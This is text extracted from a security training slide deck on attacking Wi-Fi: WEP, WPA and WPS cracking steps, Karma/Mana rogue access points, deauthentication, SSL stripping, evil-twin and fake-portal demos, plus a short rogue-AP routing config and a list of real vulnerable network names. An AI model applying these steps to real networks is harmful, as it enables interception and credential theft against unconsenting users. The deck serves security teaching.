4. neXusADVANCED SECURITY TRAINING
This
talk
is
about
•Overview
of
the
current
state
of
the
technology
•
Overview
of
existing
attacks
against
the
infrastructure
•Overview
of
existing
attacks
against
the
client
•Overview
of
the
current
tools
and
defences
7. neXusADVANCED SECURITY TRAINING
Frame
types
• Management
Frames:
Allow
for
the
maintenance
of
communication
• Control
Frames:
Facilitate
in
the
exchange
of
data
frames
• Data
Frames:
Carry
packets
with
data
(files,
webpages…)
9. neXusADVANCED SECURITY TRAINING
Management
Frames
• Beacon:
AP
says:
“Yo,
I’m
here,
and
I
do
blahblahblah”
• Probe:
request/response
:
STA
says”Hey,
are
you
in
range
and
can
you
do
blah?”.
AP
says:”I’m
in
range
and
do
blahblahblah”.
• Authentication:
request/response:
STA
says:”I
want
to
identify
myself
and
here’s
my
key(if
any)”.
AP
says:”ok
or
not
ok”.
• (Re-‐)Association:
request/response:
STA
says:”I
want
to
connect
doing
blahblahblah
and
I
want
to
register
with
you”.
AP
says:”ok
or
not
ok”.
• De-‐Authentication
/
Dis-‐Association:
“I
don’t
want
to
be
associated/
authenticated
anymore”.
11. Wired
Equivalent
Privacy
(WEP)
its
intention
was
to
provide
data
confidentiality
comparable
to
that
of
a
traditional
wired
network
source:
wikipedia
neXusADVANCED SECURITY TRAINING
13. How
it
works
•
In
(standard)
WEP
the
RC4
seed
consists
of
the
40-‐bit
key
+
a
24-‐bit
initialisation
vector
(IV)
•
This
seed
is
used
to
generate
pseudo
random
stream
of
bits
•
This
stream
is
then
XORred
with
the
plaintext
and
sent
on
to
the
receiver
neXusADVANCED SECURITY TRAINING
14. The
flaws
•
Keys
are
spread
on
every
system,
generally
not
the
best
security
practice
•
Easy
to
enter
secret
keys:
input
is
done
via
5
ascii
characters
each
representing
8
bits
-‐>
40
bits.
Issue:
printable
ascii
characters
only
cover
a
very
small
part
of
the
possible
byte
values
a.k.a.
we
reduce
key
space
neXusADVANCED SECURITY TRAINING
15. Rule
#1
for
stream
ciphers
keys
must
never
be
used
twice
neXusADVANCED SECURITY TRAINING
16. The
flaws
•
Due
to
the
fact
that
the
IV
is
only
24
bits
long
there
is
a
50%
probability
to
use
the
same
IV
after
5000
packets
•
a.k.a.
every
5000
packets
we
use
the
same
key
•
very
much
crackable
neXusADVANCED SECURITY TRAINING
17. How
the
industry
solved
it
Deprecated
as
they
fail
to
meet
their
security
goals
Move
on
to
WPA
or
WPA2
neXusADVANCED SECURITY TRAINING
18. How
to
break
it
•
FMS
attack
•
KoreK
attack
•ChopChop
attack
•
Fragmentation
attack
•PTW
attack
neXusADVANCED SECURITY TRAINING
20. How
to
break
it
•
Step
1:
make
sure
you
are
in
range
of
the
access
point
(doh!)
•
Step
2:
set
yourself
up
with
a
wireless
adapter
in
monitor
mode
(listen
to
everyone
chatting)
•
Step
3:
be
patient
and
wait
until
you
have
sufficient
IV’s
(remember
the
5000
packets
rule)
•
Step
4:
crack
the
captured
traffic
neXusADVANCED SECURITY TRAINING
21. How
to
break
it
•
Fortunately
there
is
an
alternative
for
step
3:
–
Associate
yourself
with
the
access
point
the
AP
ignores
your
packets
and
sends
out
deacuthentication
packet
in
clear
text
if
you
are
not
associated
–
Replay
ARP
packages
which
you
see
on
the
network
ARP
packages
are
great
because
they
will
be
broadcasted
by
the
access
points
and
many
IV’s
will
be
generated
in
a
very
short
timeframe
neXusADVANCED SECURITY TRAINING
22. The
tools
•
Excellent
script
kiddie
material
!
–
toolkit
which
required
some
knowledge
about
the
actual
attack:
aircrack
–
after
that
many
many
more
‘automated’
scripts,
e.g.
(wepcrack,
fern,
gerix,
wifite,
…)
neXusADVANCED SECURITY TRAINING
27. Does
this
still
work?
•
30
minutes
walk
•
1k+
wireless
networks
identified
•
+/-‐
5,5%
or
58
wireless
networks
were
(un)protected
by
WEP
neXusADVANCED SECURITY TRAINING
28. Does
this
still
work?
Bureau
HILLAWI
Eurada_WiFi
LAPOSTE
ITB
ZyXEL
34_Second_Floor
Le
Paddock
EUROCHILD
eurocapital
CS
Belgium
Meetingroom
Belkin_G_Plus_MIM...
Thomson84B046
neXusADVANCED SECURITY TRAINING
31. The
core
changes
•
integrity
checks
were
added
to
defeat
forgeries
•
protection
against
replay
attacks
was
added
•
improved
encryption
key
solution
was
introduced
•
for
WPA2:
AES
was
used
instead
of
TKIP
neXusADVANCED SECURITY TRAINING
32. How
to
break
it
•
Attacks
against
the
algorithm
of
WPA:
–
Beck
and
Tews’
attack
–
Ohigashi-‐Morii
Attack
–
Michael
Attacks
–
The
Hole196
vulnerability
neXusADVANCED SECURITY TRAINING
34. The
flaw
•
WPA-‐PSK
/
WPA2-‐PSK:
• Weak(er)
pass-‐phrases
maybe
cracked
using
dictionary
attacks.
•
Mainly
pass-‐phrases
of
20
characters
or
less
are
vulnerable
neXusADVANCED SECURITY TRAINING
35. How
to
break
it
Before
we
begin:
•
the
passphrase
is
only
used
during
the
initial
authentication
handshake,
so
we
will
need
to
intercept
one
of
those
•
the
passphrase
used
for
the
pre-‐shared
key
must
be
present
in
our
dictionary
or
be
of
a
short(er)
length
neXusADVANCED SECURITY TRAINING
36. How
to
break
it
•
Step
1:
make
sure
you
are
in
range
of
the
access
point
(doh!)
•
Step
2:
set
yourself
up
with
a
wireless
adapter
in
monitor
mode
(listen
to
everyone
chatting)
•
Step
3:
be
patient
and
wait
until
you
have
a
client
performing
authentication
•
Step
4:
brute
force
the
pre-‐shared
key
through
the
captured
authentication
handshake
neXusADVANCED SECURITY TRAINING
37. How
to
break
it
•
Fortunately
there
is
an
alternative
for
step
3:
–
Deauthenticate
a
wireless
client
neXusADVANCED SECURITY TRAINING
38. But
wait
wasn’t
there
something
called
WPS?
convenience
kills
security
neXusADVANCED SECURITY TRAINING
40. The
flaw
•
8
digits
pin
code
+
60
seconds
time-‐out
after
3
failed
attempts
=
6.3
years
required
to
crack
the
pin
•
For
some
reason
the
pin
code
has
been
split
in
2
sets
of
4
digits
…
Hmmmm
•
The
router
tells
you
when
you
found
the
first
4,
great
checkpoint
Now
we
only
need
1
day
to
crack
the
pin
…
neXusADVANCED SECURITY TRAINING
41. The
flaw
•
To
make
matters
worse:
–
pin
code
in
many
cases
is
built-‐in,
no
way
to
change
it
–
WPS
functionality
can,
in
some
cases,
not
be
disabled
–
some
routers
offering
the
option
to
disable
WPS
…
…
don’t
really
disable
WPS
after
all
neXusADVANCED SECURITY TRAINING
42. How
to
break
it
Brute
Force!
neXusADVANCED SECURITY TRAINING
46. Does
this
still
work?
•
Same
round
•
1055
wireless
networks
identified
•
+/-‐
18%
or
178
wireless
networks
were
using
WPS
neXusADVANCED SECURITY TRAINING
47. Does
this
still
work?
Cisco
Ducale
51
ActuaTV-‐VP
Meetingroom
STELLA
Consulting
EUROHUB
CONSULTANCY
Regency
Misija
NATO
Voyager
King's
Room
FurEurope
francite
Kabinet
michel
Act
As
One
Exco
II
Economic
neXusADVANCED SECURITY TRAINING
49. How
it
works
•
Replace
the
pre-‐shared-‐key
with
more
corporate
grade
authentication
system
covering:
–
authentication
–
key
distribution
•
Extensible
Authentication
Protocol
a.k.a.
authentication
framework
neXusADVANCED SECURITY TRAINING
50. LEAP
•Lightweight
EAP
–
Credentials
are
sent
using
MS-‐CHAP
without
SSL
tunnel
protection
–
User
credentials
are
not
strongly
protected
–
Offline
password
cracking
possible
neXusADVANCED SECURITY TRAINING
51. PEAP
•Protected
EAP
–
EAP
is
encapsulated
in
a
TLS
tunnel
(encryption
&
authentication)
–
Credentials
are
sent
using
MS-‐CHAPv2
neXusADVANCED SECURITY TRAINING
52. EAP
•
Many
variants
available
(hence
extensible):
–
EAP-‐TLS:
based
on
certificates
and
public/private
keys
–
EAP-‐MD5:
based
on
MD5
hashing
to
pass
credentials
–
EAP-‐IKEv2:
based
on
Key
Exchange
Protocol
version
2
neXusADVANCED SECURITY TRAINING
53. Flaws
&
attacks
•
EAP
overall:
–
communication
between
Access
Points
and
RADIUS
server(s)
relies
only
on
the
HMAC-‐MD5
hashing
algorithm
in
RADIUS
implementations
=
vulnerable
to
man-‐in-‐the-‐middle
attacks
–
users
/
endpoints
are
left
with
the
decision
whether
or
not
to
trust
the
certificates
provided
by
the
authenticator
=
vulnerable
to
impersonation
attack
neXusADVANCED SECURITY TRAINING
58. Last
but
not
least
The
wireless
access
point
or
router
interfaces
neXusADVANCED SECURITY TRAINING
59. neXusADVANCED SECURITY TRAINING
AP’s
are
no
other
then
the
rest
•Default
configuration
/
passwords
…
far
too
common
•Webservers
embedded
in
small
devices
…
•Attacks
which
tend
to
work
on
regular
websites
also
work
against
admin
pages:
•Cross
Site
Request
Forgery
•DNS
rebinding
60. Further
reading
•
http://www.iescobar.net/survey%20wifi.pdf
•
https://www.matthieu.io/dl/wifi-‐attacks-‐wep-‐wpa.pdf
•https://en.wikipedia.org/wiki/Fluhrer,_Mantin_and_Shamir_attack
•
http://dl.aircrack-‐ng.org/breakingwepandwpa.pdf
•
http://www.aircrack-‐ng.org/doku.php?id=simple_wep_crack
•
http://www.aircrack-‐ng.org/doku.php?id=cracking_wpa&s[]=wpa&s[]=crack
neXusADVANCED SECURITY TRAINING
62. Major Categories
• Attacking the client directly: wireless card driver
attacks
• Attacking the client via “Man in the Middle”
attacks (MitM)
neXusADVANCED SECURITY TRAINING
63. Wireless Driver Attacks
• Mostly Buffer Overflow type flaws
• Not trivial: requires deep knowledge on OS/Kernel
level
• Vendor specific
• Not much has happened lately
neXusADVANCED SECURITY TRAINING
64. Last public driver BO Exploit dates from 2010
neXusADVANCED SECURITY TRAINING
65. “Man in the Middle” Attacks
• Victim connects to “evil” AP -> Attacker has
control over traffic
• Very popular
• = Starting Point of 50 shades of exploitation:
sniffing, injection, dns poisoning,…
neXusADVANCED SECURITY TRAINING
66. Popular Attacks
• Free Wifi : because people like free stuff
• Karma/Jasager: because 802.11 is (was?) flawed
• Mana: because Karma is flawed
• Mana-toolkit: attacking secure networks
• Fake Portal: because social engineering is
effective
neXusADVANCED SECURITY TRAINING
67. Free Wifi
• How it works: just set up an open AP in a crowded
area and people will connect
• Tools needed: Laptop+ Kali Linux : Hostapd/
Airbase-ng + iptables + forwarding + dnsmasq
• or get a Pineapple MarkV if you have 99 USD
lying around
neXusADVANCED SECURITY TRAINING
68. Freewifi config: Routing and NAT:
ifconfig wlan1 up
ifconfig wlan1 172.16.50.1/24
iptables --policy INPUT ACCEPT
iptables --policy OUTPUT ACCEPT
iptables --policy FORWARD ACCEPT
iptables -t nat -F
iptables -F
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
echo '1' > /proc/sys/net/ipv4/ip_forward
+ run hostapd and dnsmasq (configs next slides)
neXusADVANCED SECURITY TRAINING
72. But
I
don’t
trust
“FreeWifi”1…
Enter
the
“PNL”
•a.k.a.
The
Preferred
Network
List
•Every
Eme
we
connect
to
an
AP,
it
get’s
stored
on
our
devices
in
the
PNL
•Our
devices
“probe”
all
the
Eme
for
these
networks
•When
probing
for
a
specific
network,
the
device
sends
a
request
probe
with
a
specific
SSID
(directed
probe)
•Devices
also
send
out
null
probes:
request
probes
with
SSID=“”
neXusADVANCED SECURITY TRAINING
73. But
I
don’t
trust
“FreeWifi”2…..
Enter
“Karma”
•Karma
aWack:
an
AP
that
responds
posiEve
to
all
directed
probes
(a.k.a.
“Jasager”)
Is “Macdonalds” Wifi here?
Sure, that’s me
Is “corporate-guest” here?
Sure, that’s me
neXusADVANCED SECURITY TRAINING
74. What
happened
(unEl+-‐2012)
•Clients
constantly
sent
directed
probes
for
all
networks
in
their
PNL
(Preferred
Network
List)
•An
evil
Karma
AP
responded
posiEvely
to
any
directed
probe
•Clients
automaEcally
(!!)
connected
to
the
Karma
AP
neXusADVANCED SECURITY TRAINING
75. So,
what
happened
around
+-‐2012?
•Vendors
silently
‘fixed’
behaviour
in
newer
OS’:
Clients
only
connected
when
AP
responded
to
BOTH
directed/null
probe
•Devices
stopped
constantly
sending
directed
probes.
Some
stopped
sending
them
altogether
(IOS).
•Karma
didn’t
respond
to
broadcast
null
probes
Karma
was
broken
neXusADVANCED SECURITY TRAINING
76. Hackers
‘fix’
Karma
aWack…
Enter
“Mana”
•Mana
=
modified
Hostapd
for
Karma
aWack
•Actually:
Mana-‐toolkit
(modded
hostapd
+
bunch
of
stuff)
•Mana
waits
unEl
it
sees
a
directed
probe
and
then
responds
to
both
directed
and
broadcast
probe.
•Behaviour
of
probing
sEll
differs
greatly
between
OS’s
•Also
has
‘loud
mode’:
it
keeps
a
list
of
all
SSID’s
it
sees
from
all
devices
and
broadcasts
them:
more
chance
to
get
‘popular’
SSID’s
neXusADVANCED SECURITY TRAINING
77. DetecEng
probes
•Wireshark
filter
for
request
probes:
wlan.fc.type_subtype
==
0x04
•or
Python+
scapy
•don’t
forget
to
put
interface
in
monitor
mode
neXusADVANCED SECURITY TRAINING
78. Example:
Nexus
5
Phone
with
Android
OS
4.4.3
•ErraEc:
direct
probes
with
30
seconds
to
10
minute
intervals.
neXusADVANCED SECURITY TRAINING
79. So
what
about
hidden
SSID’s
?
•Hidden
networks
don’t
return
a
SSID
in
response
to
a
broadcast
probe:
the
AP
only
gives
the
SSID
when
receiving
a
directed
probe.
•Devices
with
a
hidden
network
in
their
PNL
need
to
probe
for
it
specifically
•IOS
devices
only
do
this
when
it
sees
at
least
1
hidden
network
•SoluEon:
put
a
hidden
network
somewhere
to
get
directed
probes
from
IOS
devices
for
hidden
networks
neXusADVANCED SECURITY TRAINING
81. Can
we
get
more
“vicEms”?
Enter
“De-‐Auth”
•De-‐authenEcaEon
packet
is
sent
to
terminate
communicaEon
between
a
client
and
an
AP
•Is
done
via
a
management
packet:
cleartext
•Can
be
spoofed
easily
Anyone
can
de-‐authenEcate
anyone
We
can
disconnect
exisEng
connecEons
(unEl
they
connect
to
us)
neXusADVANCED SECURITY TRAINING
82. DeauthenEcaEon
tools
•Aireplay-‐ng:
e.g.
deauth
all
clients
of
BSSID
7a:54:2e:9c:31:1f
•mdk3
(“Murder
Death
Kill”)
•Several
scripts
neXusADVANCED SECURITY TRAINING
84. What
about
secure
networks?
(SSL)
•A
lot
of
apps
use
SSL
connecEons
•login
pages
/
sensiEve
data:
websites
use
SSL
•an
aWacker
performing
MitM
can
not
read
data
directly
•A
lot
of
aWacks
against
SSL
lately
(BEAST,
POODLE,
…),
but
most
aWacks
impracEcal
(except
heartbleed,
which
isn’t
a
MitM
aWack)
neXusADVANCED SECURITY TRAINING
85. Common
aWack
methods
1:
Fake
CERT
•Terminate
SSL
connecEon
in
the
Middle
and
present
your
own
cerEficate.
•Problem:
SSL
popup
•SoluEon:
None.
•But
users
usually
click
through
annoying
popups
:)
No Problem :)
neXusADVANCED SECURITY TRAINING
86. Common
aWack
methods
2:
SSLSTRIP
•SSLStrip
is
a
proxy
in
the
Middle
that
changes
all
HTTPS
links
in
hWp
responses
to
HTTP
(it
“strips”
the
SSL)
•Problem:
»
A)
works
only
for
redirects
to
hWps
»
B)
address
in
browser
shows
as
hWp
instead
of
hWps
•SoluEon:
»A)
None
»B)
we
add
a
favicon
that
looks
like
a
lock:
good
enough
for
most
users
neXusADVANCED SECURITY TRAINING
88. Vendors
Response:
HSTS
•HSTS
=
HTTP
Strict
Transport
Security
•Sites
can
send
a
‘Strict-‐Transport-‐Security’
response
header
back
to
the
browser
•Once
the
browser
has
received
this,
the
browser
will
only
connect
directly
in
HTTPS
•Google
also
maintains
a
preloaded
list
•Used
by
latest
versions
of
Chrome,
Safari,
Firefox
(not
IE<12)
neXusADVANCED SECURITY TRAINING
89. Hackers
Respond:
SSLSplit
•SOLUTION:
“sslsplit”
=
modified
sslstrip
–“Works
like
a
proxy,
similar
to
sslstrip.”
–“
SSLsplit
removes
response
headers
for
HPKP
in
order
to
prevent
public
key
pinning
for
HSTS,
to
allow
the
user
to
accept
untrusted
cerEficates”
–
generates
on
the
fly
fake
cerEficates
•But
if
the
user
already
browsed
to
the
site
before,
the
browser
will
sEll
use
HTTPS
only
Problem
not
yet
solved
neXusADVANCED SECURITY TRAINING
90. Hackers
respond
some
more:
SSLStrip+
•SSLStrip+
changes
hostname:
–
User
wants
to
surf
to
www.google.com
and
gets
redirected
to
wwww.google.com
.
SSLStrip+
keeps
track
of
DNS.
–
users
wants
to
surf
to
account.google.com
and
gets
redirected
to
accounts.google.com
•Because
accounts.google.com
and
wwww.google.com
do
not
exist,
the
browser
also
doesn’t
have
an
HSTS
entry
for
them,
and
sslsplit
works.
•Latest
aWack
against
HSTS:
NTP
MitM
neXusADVANCED SECURITY TRAINING
93. Demo:
Evil
Twin
Scenario
•We
listen
for
wireless
traffic
around
us
and
see
open
AP
“ABC”
•We
setup
an
access
point
with
Mana
Toolkit
and
name
it
“ABC”
•We
de-‐authorise
“USER1”
who
is
connected
to
“ABC”
•“USER1”
connects
to
our
AP
•We
sniff
traffic,
using
SSLStrip+
and
capture
the
google
password
neXusADVANCED SECURITY TRAINING
96. Demo:
Evil
Portal
•We
Set
Up
a
Wireless
Portal
that
Provides
free
access
(preferably
somewhere
where
there’s
a
lot
of
people
and
no
other
AP’s)
•Some
social
engineering:
people
can
login
with
Google,
facebook,
twiWer
and
other
social
media
accounts
•…
but
not
really
neXusADVANCED SECURITY TRAINING
98. Conclusions
•Karma
aWack
sEll
works
on
some
devices
but
not
that
great
(not
many
direct
probes)
•There
are
sEll
tricks
to
‘bypass’
secure
networks,
but
vendors
are
working
on
it
as
well
(HSTS)
•Most
effecEve
aWacks
these
days
involve
some
degree
of
social
engineering:
Evil
Twin
+
Deauth,
Fake
CapEve
Portal
neXusADVANCED SECURITY TRAINING
100. neXusADVANCED SECURITY TRAINING
Want
to
see
more?
•
www.nexus-‐training.eu
•
video’s
available
•
slideset
will
be
provided
there
too
•
training
•
30.03-‐01.04
3
day
hacking
introducEon
@
Ausy
(Haasrode)
hWp://www.dataflow.be/en/ethical-‐hacking-‐training-‐hacking-‐
explained-‐condensed